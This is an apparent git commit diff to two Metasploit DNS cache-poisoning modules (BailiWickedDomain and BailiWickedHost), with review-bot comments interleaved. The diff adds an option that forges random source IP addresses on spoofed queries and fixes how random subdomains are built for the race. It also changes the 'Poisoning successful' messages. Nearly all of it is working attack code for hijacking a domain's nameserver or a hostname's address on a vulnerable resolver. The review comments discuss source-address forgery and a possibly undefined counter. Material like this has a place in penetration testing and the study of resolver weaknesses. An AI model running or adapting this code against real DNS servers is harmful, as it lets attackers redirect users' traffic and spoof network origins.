Adds an option to randomize the source address of the queries as well as some cosmetic changes. The tuning code should be forwarding queries properly now.
git-svn-id: file:///home/svn/framework3/trunk@5602 4d416f70-5f16-0410-b530-b9f4589650da
parent
9b56053974
commit
b4fc255a41
|
@ -43,6 +43,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
|
OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),
|
||||||
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
|
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
|
||||||
OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),
|
OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),
|
||||||
OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),
|
OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),
|
||||||
|
@ -136,6 +137,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
|
||||||
def run
|
def run
|
||||||
target = rhost()
|
target = rhost()
|
||||||
source = Rex::Socket.source_address(target)
|
source = Rex::Socket.source_address(target)
|
||||||
|
saddr = datastore['SRCADDR']
|
||||||
sport = datastore['SRCPORT']
|
sport = datastore['SRCPORT']
|
||||||
domain = datastore['DOMAIN'] + '.'
|
domain = datastore['DOMAIN'] + '.'
|
||||||
newdns = datastore['NEWDNS']
|
newdns = datastore['NEWDNS']
|
||||||
|
@ -279,10 +281,15 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
|
||||||
|
|
||||||
req.rd = 1
|
req.rd = 1
|
||||||
|
|
||||||
|
src_ip = source
|
||||||
|
|
||||||
|
if(saddr == 'Random')
|
||||||
|
src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")
|
||||||
|
end
|
||||||
|
|
||||||
buff = (
|
buff = (
|
||||||
Scruby::IP.new(
|
Scruby::IP.new(
|
||||||
#:src => barbs[0][:addr].to_s,
|
:src => src_ip,
|
||||||
:src => source,
|
|
||||||
:dst => target,
|
:dst => target,
|
||||||
:proto => 17
|
:proto => 17
|
||||||
)/Scruby::UDP.new(
|
)/Scruby::UDP.new(
|
||||||
|
@ -350,7 +357,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
|
||||||
answer = Resolv::DNS::Message.decode(answer)
|
answer = Resolv::DNS::Message.decode(answer)
|
||||||
answer.each_answer do |name, ttl, data|
|
answer.each_answer do |name, ttl, data|
|
||||||
if((name.to_s + ".") == domain and data.name.to_s == newdns)
|
if((name.to_s + ".") == domain and data.name.to_s == newdns)
|
||||||
print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}")
|
print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{domain} == #{newdns}")
|
||||||
srv_sock.close
|
srv_sock.close
|
||||||
disconnect_ip
|
disconnect_ip
|
||||||
return
|
return
|
||||||
|
@ -385,7 +392,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
|
||||||
|
|
||||||
times = []
|
times = []
|
||||||
|
|
||||||
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
|
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
|
||||||
|
|
||||||
sock = Rex::Socket.create_udp(
|
sock = Rex::Socket.create_udp(
|
||||||
'PeerHost' => server,
|
'PeerHost' => server,
|
||||||
|
@ -413,7 +420,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
|
||||||
times << [Time.now.to_f - q_beg_t, cnt]
|
times << [Time.now.to_f - q_beg_t, cnt]
|
||||||
cnt = 0
|
cnt = 0
|
||||||
|
|
||||||
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
|
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
|
||||||
|
|
||||||
Thread.critical = false
|
Thread.critical = false
|
||||||
|
|
||||||
|
|
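Review bot: The `SRCADDR` option added in the first hunk does not say what `Random` actually does, and its attribute array ends in a second `'Real'` after the enum list that looks redundant, because the default is already given in the third position. The hunk at -279 sets `src_ip` to four random octets, so with `Random` the packet carries a forged source address, any reply goes to an unrelated host, and networks that apply source-address validation (BCP 38) will drop the traffic. I would put that in the description, for example `'The source address to use for sending the queries (Random forges the address; replies go to third-party hosts)'`. If `OptEnum` does not read a fifth element, the array should end at `['Real', 'Random']`. The same option and `src_ip` block are repeated in the BailiWickedHost section.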
|
@ -36,12 +36,14 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
|
OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),
|
||||||
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
|
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
|
||||||
OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']),
|
OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']),
|
||||||
OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),
|
OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),
|
||||||
OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']),
|
OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']),
|
||||||
OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]),
|
OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]),
|
||||||
OptInt.new('TTL', [true, 'The TTL for the malicious host entry', 31337]),
|
OptInt.new('TTL', [true, 'The TTL for the malicious host entry', 31337]),
|
||||||
|
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
@ -49,7 +51,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
def auxiliary_commands
|
def auxiliary_commands
|
||||||
return {
|
return {
|
||||||
"check" => "Determine if the specified DNS server (RHOST) is vulnerable",
|
"check" => "Determine if the specified DNS server (RHOST) is vulnerable",
|
||||||
"racer" => "Determine the size of the window for the target server"
|
"racer" => "Determine the size of the window for the target server",
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -129,6 +131,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
def run
|
def run
|
||||||
target = rhost()
|
target = rhost()
|
||||||
source = Rex::Socket.source_address(target)
|
source = Rex::Socket.source_address(target)
|
||||||
|
saddr = datastore['SRCADDR']
|
||||||
sport = datastore['SRCPORT']
|
sport = datastore['SRCPORT']
|
||||||
hostname = datastore['HOSTNAME'] + '.'
|
hostname = datastore['HOSTNAME'] + '.'
|
||||||
address = datastore['NEWADDR']
|
address = datastore['NEWADDR']
|
||||||
|
@ -271,10 +274,15 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
|
|
||||||
req.rd = 1
|
req.rd = 1
|
||||||
|
|
||||||
|
src_ip = source
|
||||||
|
|
||||||
|
if(saddr == 'Random')
|
||||||
|
src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")
|
||||||
|
end
|
||||||
|
|
||||||
buff = (
|
buff = (
|
||||||
Scruby::IP.new(
|
Scruby::IP.new(
|
||||||
#:src => barbs[0][:addr].to_s,
|
:src => src_ip,
|
||||||
:src => source,
|
|
||||||
:dst => target,
|
:dst => target,
|
||||||
:proto => 17
|
:proto => 17
|
||||||
)/Scruby::UDP.new(
|
)/Scruby::UDP.new(
|
||||||
|
@ -342,7 +350,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
answer = Resolv::DNS::Message.decode(answer)
|
answer = Resolv::DNS::Message.decode(answer)
|
||||||
answer.each_answer do |name, ttl, data|
|
answer.each_answer do |name, ttl, data|
|
||||||
if((name.to_s + ".") == hostname and data.address.to_s == address)
|
if((name.to_s + ".") == hostname and data.address.to_s == address)
|
||||||
print_status("Poisoning successful after #{queries} attempts: #{name} == #{address}")
|
print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{name} == #{address}")
|
||||||
disconnect_ip
|
disconnect_ip
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
@ -374,7 +382,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
|
|
||||||
times = []
|
times = []
|
||||||
|
|
||||||
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
|
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
|
||||||
|
|
||||||
sock = Rex::Socket.create_udp(
|
sock = Rex::Socket.create_udp(
|
||||||
'PeerHost' => server,
|
'PeerHost' => server,
|
||||||
|
@ -402,7 +410,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
times << [Time.now.to_f - q_beg_t, cnt]
|
times << [Time.now.to_f - q_beg_t, cnt]
|
||||||
cnt = 0
|
cnt = 0
|
||||||
|
|
||||||
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
|
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
|
||||||
|
|
||||||
Thread.critical = false
|
Thread.critical = false
|
||||||
|
|
||||||
|
@ -454,6 +462,6 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
# XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times)
|
# XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times)
|
||||||
avg_count
|
avg_count
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
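Review bot: The new success message in the hunk at -342 interpolates `#{responses}`, but no visible line in this section assigns `responses`. The enclosing method starts and ends outside the hunk, so this cannot be confirmed from here. If the counter is not initialised alongside `queries` before the loop, the interpolation raises `NameError` on the success path and the `disconnect_ip` cleanup that follows is never reached. It is worth checking that something like `responses = 0` sits next to the `queries` initialisation. The same message change appears in the BailiWickedDomain section in the hunk at -350.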